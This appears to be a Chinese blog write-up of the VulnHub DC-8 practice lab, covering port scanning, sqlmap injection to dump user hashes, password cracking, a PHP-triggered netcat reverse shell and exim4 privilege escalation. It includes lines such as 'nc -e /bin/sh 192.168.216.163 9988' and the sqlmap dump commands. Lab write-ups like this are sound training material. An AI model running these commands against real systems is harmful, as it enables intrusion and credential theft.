【安全靶场】-DC-8

于 2024-08-20 05:05:18 发布
阅读量434 收藏 4
点赞数 18
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qinjilll/article/details/141339756
版权

❤️博客主页 iknow181
🔥系列专栏 网络安全、 PythonJavaSEJavaWebCCNP
🎉欢迎大家点赞👍收藏⭐评论✍

在这里插入图片描述

目标:192.168.216.150

一、收集信息

1.端口扫描

nmap -T4 -A 192.168.216.150 -p-

看到80端口

2.扫描网站

nikto -u http://192.168.216.150

扫描到登录页面http://192.168.216.150/user/login

3.查看网站

发现url有/?nid=1,可能可以使用sql注入

二、漏洞扫描

1.使用sqlmap

sqlmap -u http://192.168.216.150/?nid=1 --dbs
发现库名d7db

sqlmap -u http://192.168.216.150/?nid=1 -D d7db --table
发现users

sqlmap -u http://192.168.216.150/?nid=1 -D d7db -T users --columns
发现name,pass

sqlmap -u http://192.168.216.150/?nid=1 -D d7db -T users -C name,pass --dump
发现admin,john

将username和password放到一个usernamepass.txt文件中,用:连接

2.破解密码

john usernamepass.txt

爆出john的密码:turtle

三、漏洞利用

1.登录网站后台

192.168.216.150/user/login

2.nc连接

找到可以编辑php代码的地方

保存

kali端nc进行监听
nc -lvp 1234

到view页面提交一个

四、提权

1.美化界面

python -c 'import pty;pty.spawn("/bin/bash")'

2.看一下哪些是以root权限执行的

find / -perm -u=s -type f 2>/dev/null

发现

3.查看exim4的版本

4.查看exim4的漏洞

searchsploit exim

5.下载木马

6.建立一个python服务器让对方下载

7.查看木马怎么用

8.执行木马(先赋予777权限)

9.再次nc连接

nc -lvp 9988

nc -e /bin/sh 192.168.216.163 9988

总结

有的时候,漏洞无法使用,可能是字符的问题。

解决方法:

vi 文件.sh

在命令行模式输入 :set ff? 查看字符格式,如果是dos就不行,一定要为unix

在命令行模式输入 :set ff=unix

在这里插入图片描述

iknow181
关注
  • 18
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC-8靶场
2301_76690905的博客
12-20 1347
下载后解压会有一个DC-8.ova文件。在网页里到处点击,找到了可以执行php代码的地方,可以执行Php代码的地方在,联系我们-->WEBFROM-->Form settings的地方,选择php code。-p, --path [EDB-ID] 显示漏洞利用的完整路径(如果可能,还将路径复制到剪贴板),后面跟漏洞ID号。使用“-v”(详细)来尝试更多的组合。
DC靶场系列--DC1
BGiscool的博客
06-28 4895
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
vulnhub靶场DC-3
qq_58091216的博客
01-08 1292
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
DC-1靶场
mlws1900的博客
03-21 1426
下载地址把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可启动靶机,如下图所示即可。
VulnHub靶场-DC:1
weixin_48972359的博客
04-16 645
靶机:DC:1靶机里有5个flag,并要求获取root权限。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 430
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
AI安全-文生图
深度安全实验室
08-15 254
AI安全-文生图
等保测评中的安全需求分析:构建精准的信息安全防护体系
w13359990065的博客
08-15 683
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
[图解]片段16 ESS状态机图-SysMLEA建模住宅安全系统
rolt的专栏
08-19 651
好,我们看,首先,电源管理这里,有两个状态
新160个crackme - 030-Acid Bytes.4
qq_41483767的博客
08-14 284
Delphi程序分析,upx脱壳,ida静态分析、动态调试,简单算法
四路一体行车记录仪,语音提示注意行人,保障车辆行驶安全
jiuxindianzi的博客
08-15 282
九盾安防推出四路一体行车记录仪,全方位记录叉车工作场景,实时记录行驶信息,提供高清影像,减少伤亡事故,提升安全性和效率,解决事故责任划分难题,助力企业管理。
华为账号“一键登录”能力让美团用户尽享安全便捷的登录体验
最新发布
HarmonyOS SDK闭源开放能力技术团队
08-19 334
3.将获取到的匿名手机号设置给下面PreviewLoginButtonPage示例代码中的quickLoginAnonymousPhone变量,调用LoginWithHuaweiIDButton组件,实现应用自己的登录页面,并展示华为账号一键登录按钮和华为账号用户认证协议(Account Kit提供跳转链接,应用需实现协议跳转,参见约束与限制第2点),用户同意协议并点击一键登录按钮后,可获取到Authorization Code,将该值传给应用服务器用于获取用户信息(完整手机号、UnionID)。
同态加密和SEAL库的介绍(十)CKKS 参数心得 2
WaitMrAnt的博客
08-12 889
本篇继续上篇针对 CKKS 方案的测试,首先证明了重新线性化虽然会减少密文长度,但是并不会对计算结果的精度有明显的影响;模数链的长度确实会限制乘法深度(具体来说是 Rescale 次数),这点上密文乘法和明文乘法相同;上篇中证明了增加 scale 会提高精度,本篇也证明了增长模数链也能增加精度,但是内存测试后,前者 scale 不会提高内存,后者会增加内存成本和时间成本。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 619
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iknow181

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值